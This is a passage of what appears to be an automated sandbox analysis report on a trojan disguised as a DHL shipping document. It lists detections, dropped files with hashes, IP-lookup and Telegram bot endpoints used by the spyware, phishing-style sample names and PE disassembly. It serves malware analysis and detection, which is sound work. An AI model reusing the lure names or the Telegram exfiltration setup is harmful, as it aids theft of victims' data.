                DHL AWB SHIPPING DOCS_AWB_0009123.exe44%ReversingLabsWin32.Trojan.Nsisx
                DHL AWB SHIPPING DOCS_AWB_0009123.exe37%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe23%ReversingLabsWin32.Trojan.InjectorX
                C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe13%VirustotalBrowse

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                2.2.tdbwdaltxz.exe.400000.1.unpack100%AviraTR/ATRAPS.GenDownload File
                2.2.tdbwdaltxz.exe.2b40000.5.unpack100%AviraHEUR/AGEN.1203035Download File

                Domains

                SourceDetectionScannerLabelLink
                checkip.dyndns.com0%VirustotalBrowse
                checkip.dyndns.org0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://checkip.dyndns.org40%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://schemas.m0%URL Reputationsafe
                http://checkip.dyndns.com0%URL Reputationsafe
                http://checkip.dyndns.com0%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                checkip.dyndns.com
                		193.122.6.168
                		truetrueunknown
                checkip.dyndns.org
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://checkip.dyndns.org/true
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://checkip.dyndns.org4tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://checkip.dyndns.orgtdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.mtdbwdaltxz.exefalse
                • URL Reputation: safe
                		unknown
                http://checkip.dyndns.comtdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://nsis.sf.net/NSIS_ErrorErrorDHL AWB SHIPPING DOCS_AWB_0009123.exefalse
                  		high
                  https://api.telegram.org/bottdbwdaltxz.exe, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametdbwdaltxz.exe, 00000002.00000002.519971304.0000000002C11000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://checkip.dyndns.org/qtdbwdaltxz.exe, 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      193.122.6.168
                      		checkip.dyndns.comUnited States
                      		31898ORACLE-BMC-31898UStrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:800700
                      Start date and time:2023-02-07 18:23:13 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 42s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample file name:DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/5@2/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 24% (good quality ratio 22.1%)
                      • Quality average: 81.2%
                      • Quality standard deviation: 30.1%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 74
                      • Number of non-executed functions: 105
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      18:25:30API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      193.122.6.1681pj5PSEpGn.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      CICU3023855.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      Ydfhvdwolyu.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      PURCHASE ORDER C-SB005740-392 0574.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      Fewfrl.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      Dekont_202302061533908 pdf.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      98764567890-0876.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      80bzV4ixUi.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      SgcmXDoQO8.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      zmk2cH9YvualFtD.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      Um7SEIsVYrxGzVd.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      f2SvTX1dsv.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      SMGS.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      1lD8ADvXzQl1f7g.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      Q1343 Q1344 240 Dishware.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      IRYSrA7yRt.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      MOQ-10356-507.xlsmGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      #U041f#U043b#U0430#U0446#U0435#U0436#U043d#U044b #U0444#U0430#U0439#U043b_01099388402_vcb.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      eTfneS4zTZnJUHw.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/
                      Projekt 41-17-082 BR192.exeGet hashmaliciousBrowse
                      • checkip.dyndns.org/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      checkip.dyndns.comStatement of account.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      SDG098765456789000090.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      vbc.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      arinzezx.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      hesaphareketi-01.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      CkfIgXCvUE.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      QrmkCyChrIFVWYg.exeGet hashmaliciousBrowse
                      • 132.226.247.73
                      PayAdvSupplier0000211827Remittance2000143099.exeGet hashmaliciousBrowse
                      • 132.226.247.73
                      hLCwWfmEDk.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      um3r24Ykj1.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      1pj5PSEpGn.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      RFQ 50000 - Saudi Arabia.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      HEgub.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      CICU3023855.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      Ydfhvdwolyu.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      Swift Copy.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      30UuDcpwk2.exeGet hashmaliciousBrowse
                      • 132.226.8.169
                      PURCHASE ORDER C-SB005740-392 0574.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      Fewfrl.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      6543457654345.exeGet hashmaliciousBrowse
                      • 158.101.44.242

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      ORACLE-BMC-31898UShttp://129.146.126.156/kek/libcurlnewGet hashmaliciousBrowse
                      • 129.146.126.156
                      hesaphareketi-01.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      um3r24Ykj1.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      1pj5PSEpGn.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      RFQ 50000 - Saudi Arabia.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      HEgub.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      CICU3023855.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      Ydfhvdwolyu.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      Swift Copy.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      PURCHASE ORDER C-SB005740-392 0574.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      Fewfrl.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      6543457654345.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      Tvccjkahqr.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      9876543234567086543456.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      T0mfmDdkwX.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      Dekont_202302061533980 pdf.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      INVOICE 0029020 2023_pdf.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      https://ultrawidesnowboards.com/url?link=https://notice5673993040240404notice477488-ev2rr.pagemaker.link/notice-5673993040240404-notice-477488Get hashmaliciousBrowse
                      • 134.70.16.1
                      Dekont_202302061533908 pdf.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      98764567890-0876.exeGet hashmaliciousBrowse
                      • 193.122.6.168

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\nsq9965.tmp

                      Download File
                      Process:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):384998
                      Entropy (8bit):7.53345051811731
                      Encrypted:false
                      SSDEEP:6144:GiNgXKy76cANX89+opVo/l5YuNWfD4uFKjUP8dIZpSuAL+/zVM4/aN8OCTGdc+Vo:GiN1lcANX8kopVo/l5YuNiD4djBdM3Am
                      MD5:C2CBFC18756BC145C8A0907ED158105A
                      SHA1:87E0D94172166CBD10BF258BA60062662A073F96
                      SHA-256:3D567DCC795B1B3BF6E755BBA0ADF2FB9C771039CFCA9BC8B1C9EFA0D4C5059C
                      SHA-512:4ACEAD4873FCAFA93C771CB969D4CD315C32B6374F2FA4B03DB45606DF3F714C421E668421A6D5ACBE0BB9605DF9FE13F6193EA99FB46C8935E5756E9206E1FD
                      Malicious:false
                      Reputation:low
                      Preview:.9......,........................(.......8......j9..............................................................................%...........................................................................................................................................................G...................j...............................................................................................................................p...........F...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\rjnyysvx.m

                      Download File
                      Process:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):5952
                      Entropy (8bit):7.144643695336174
                      Encrypted:false
                      SSDEEP:96:Farc6oYTg/DrYu0bk2XO5oSw0Qj7KPZ4dNriFdndNiPKqWuAbS4Vuw1OlH1l9I:FarcRXYhX1SJSKPZQRinndcZ2bS4Vuw7
                      MD5:6C5E26AD7985FBE1F56D400664E1F130
                      SHA1:6719DF376987B06E9D5410931F3341D0F34CBF14
                      SHA-256:28240426EE93AFD8466A587C3E1985F410136B71CA176C7AF36CF0E01153C32D
                      SHA-512:484BDF3D8FAC11086184A3300BEFAF4E7EC19C6CBD82FD15387BB2FC2240B7D2770767A0953D77A799069E096A89039AEDD35DE6C85F1A44CEF00AE062C57424
                      Malicious:false
                      Reputation:low
                      Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                      C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe

                      Download File
                      Process:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):133120
                      Entropy (8bit):6.4113662500317306
                      Encrypted:false
                      SSDEEP:1536:idx1IKgbTK9n+iO2UzWe1+M+v6TGabh/b9QWWGuld6YpcA2suPtMO/b6qf7meggO:g1+a614qVbh/b9QWpocYpxEtPf7megt
                      MD5:377552A9A2C84B8C55314176A566C079
                      SHA1:EEDD3BD9AE6661E41BD8CE989AEF58383AB5B360
                      SHA-256:4ADA7E83E7FFA97F90588475D5C9356A9F1003E1CC7721D227CA0609EF23E9DC
                      SHA-512:554D8AAEBBB117E12798F6B7CADA554A49F332F91912A44503709E6022387A06FD46DBFA47E5E0B855DD5331A451C4C502AA77589533671BEA894B1B62C7D389
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 23%
                      • Antivirus: Virustotal, Detection: 13%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?..D^.D^.D^..>._^..<.N^..?.)^.D^..^.)H.]^.c.?.E^.c.8.E^.c.=.E^.RichD^.........PE..L......c............................UD............@..........................`............@.................................|........0.......................@..........................................@............................................text.............................. ..`.rdata...D.......F..................@..@.data....-..........................@....rsrc........0......................@..@.reloc..L....@......................@..B........................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\wfpxt.ubj

                      Download File
                      Process:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):231188
                      Entropy (8bit):7.955184590739643
                      Encrypted:false
                      SSDEEP:6144:6iNgXKy76cANX89+opVo/l5YuNWfD4uFKjUP8dIZpSuAL+/zVM4/aN8OCX:6iN1lcANX8kopVo/l5YuNiD4djBdM3AS
                      MD5:912FD2CFFA357488F81E8C626E176050
                      SHA1:67ED3E87F65DC8DA0522AD5246BB9307A5C451E0
                      SHA-256:EF39E2F328D3AF0F953FBE899102F6689A41F12D5160F005815D4F619D9BFD31
                      SHA-512:602109846C9CA54898775F4E24761759FC9D87805B44301BFDABC5C6A4D4414A37414E9DDBDC0370CF642A717689A71EDFEBB6EB2DE664A2DE5819A6882706B0
                      Malicious:false
                      Reputation:low
                      Preview:.n+.....{.K.u.).4p.....].....a...u..{.n BW6.P..:....Y..U..P...../.?.<`A...7.!.o-^I,.....T.d..q...B.1.....P.B.#2....,....G.........5...p...G..By.Zf..<c5..P.....<....4t......Z.)KI!LxY)..780.zT..H.8i..}...8.*l.m(......a.7..fR:.pR.....<.R.|.>RM...E........K..s.........]....!F.xwL.%u..9n BW6R...:M....Y..e.*.p'..SE.......t..?.H..Nk..+...3.w....~.>.S.X.y.d9.%u.(f.....,...`.&=.q,.d...yh..:U.p.K1;.k.-.>K#.c.2hX.Ub.....2G.&Q....P....>W.R..,.u.d..D}\@...aL...R....'.y..U+.....O........zz<|.>RM...cP.0.....K.Q.).6)...I..].....a....u....E9DW6U...:.....Y.KU.*.p'..SE@..........F..N.;e+...3.y.....>...X.y.d9.%|.(.N .@+,.....&=.+,...LC........K1;.kJ-.K#.c.2hX.Ub.......&3....P....>W.R..,.u.d..D}\@M...L...R....'.y..U......O........zz<|.>RM...E......d.K.Q.).6p......].....a...u..{.n BW6.P..:....Y..U.*.p'..SE@......t..?.H..Nk[e+...3.w....~.>...X.y.d9.%u.(f.....,...`.&=.q,.@.Lyh........K1;.k.-.>K#.c.2hX.Ub.......&3....P....>W.R..,.u.d..D}\@M...L...R....'.y..U....

                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                      Download File
                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:modified
                      Size (bytes):10874
                      Entropy (8bit):3.164510375794696
                      Encrypted:false
                      SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z5+6I3+zJE+v:j+s+v+b+P+m+0+Q+q+q+73+zG+v
                      MD5:689711D9AFE7F82E830AA6B2B8A2B83C
                      SHA1:F6457E7D7B5120C6C80F9456412816CFB3F9B0E7
                      SHA-256:A3D02EC8E3DF05FC4CBF1BD7B57E7DCDC051F6D50C71BC0B3B7E0EF42154962F
                      SHA-512:B8D3DAC5FB3B2862C889B012F1BB740F9E6E4AB62E010070B0148E26276863D86C839C8CB0C29C85EBA87B8DDDFE10F8CBB21F0681754643430178C648D778D2
                      Malicious:false
                      Reputation:low
                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.186130988184906
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File size:459101
                      MD5:cf98f42b9d4bbdc20e54e7e0ca7543c0
                      SHA1:2543080386230d110b18e1b653c14d1d640998da
                      SHA256:f7b57c7265e87bee11e652eba90afe3e0c34f691cd8faf3b79fe8def96044831
                      SHA512:2a84ede5f78203d417dd00af7f70e6bc2d50f5fc3859684a10be7e2448262b1e9334c6dfc064df7feb1b302d01b9b41ce8a9880473f246bf6af7cb601c9875f0
                      SSDEEP:6144:sYa6RpFXx6QR4FUJE0S3u+vMwejAFbF6L5XamozD/DDX2zA:sYjpFXxJR40Ef3NMwekf6L5amozD3t
                      TLSH:9AA4E68118CFC40DC35E3633A5E1C52A68D0CE326057632E771ABF8EB53BB4A5B4E659
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                      File Icon

                      Icon Hash:e8f0e84c44e4e4f8

                      Static PE Info

                      General

                      Entrypoint:0x403640
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:61259b55b8912888e90f516ca08dc514

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 000003F4h
                      push ebx
                      push esi
                      push edi
                      push 00000020h
                      pop edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [ebp-14h], ebx
                      mov dword ptr [ebp-04h], 0040A230h
                      mov dword ptr [ebp-10h], ebx
                      call dword ptr [004080C8h]
                      mov esi, dword ptr [004080CCh]
                      lea eax, dword ptr [ebp-00000140h]
                      push eax
                      mov dword ptr [ebp-0000012Ch], ebx
                      mov dword ptr [ebp-2Ch], ebx
                      mov dword ptr [ebp-28h], ebx
                      mov dword ptr [ebp-00000140h], 0000011Ch
                      call esi
                      test eax, eax
                      jne 00007F336C80B17Ah
                      lea eax, dword ptr [ebp-00000140h]
                      mov dword ptr [ebp-00000140h], 00000114h
                      push eax
                      call esi
                      mov ax, word ptr [ebp-0000012Ch]
                      mov ecx, dword ptr [ebp-00000112h]
                      sub ax, 00000053h
                      add ecx, FFFFFFD0h
                      neg ax
                      sbb eax, eax
                      mov byte ptr [ebp-26h], 00000004h
                      not eax
                      and eax, ecx
                      mov word ptr [ebp-2Ch], ax
                      cmp dword ptr [ebp-0000013Ch], 0Ah
                      jnc 00007F336C80B14Ah
                      and word ptr [ebp-00000132h], 0000h
                      mov eax, dword ptr [ebp-00000134h]
                      movzx ecx, byte ptr [ebp-00000138h]
                      mov dword ptr [0042A318h], eax
                      xor eax, eax
                      mov ah, byte ptr [ebp-0000013Ch]
                      movzx eax, ax
                      or eax, ecx
                      xor ecx, ecx
                      mov ch, byte ptr [ebp-2Ch]
                      movzx ecx, cx
                      shl eax, 10h
                      or eax, ecx

                      Rich Headers

                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x2a610.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x3b0000x2a6100x2a800False0.15715188419117648data4.69978633667236IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x3b3580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States
                      RT_ICON0x4bb800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States
                      RT_ICON0x550280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States
                      RT_ICON0x5a4b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
                      RT_ICON0x5e6d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                      RT_ICON0x60c800x225fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                      RT_ICON0x62ee00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                      RT_ICON0x63f880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                      RT_ICON0x649100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                      RT_DIALOG0x64d780x100dataEnglishUnited States
                      RT_DIALOG0x64e780x11cdataEnglishUnited States
                      RT_DIALOG0x64f980x60dataEnglishUnited States
                      RT_GROUP_ICON0x64ff80x84dataEnglishUnited States
                      RT_VERSION0x650800x250dataEnglishUnited States
                      RT_MANIFEST0x652d00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                      Imports

                      DLLImport
                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
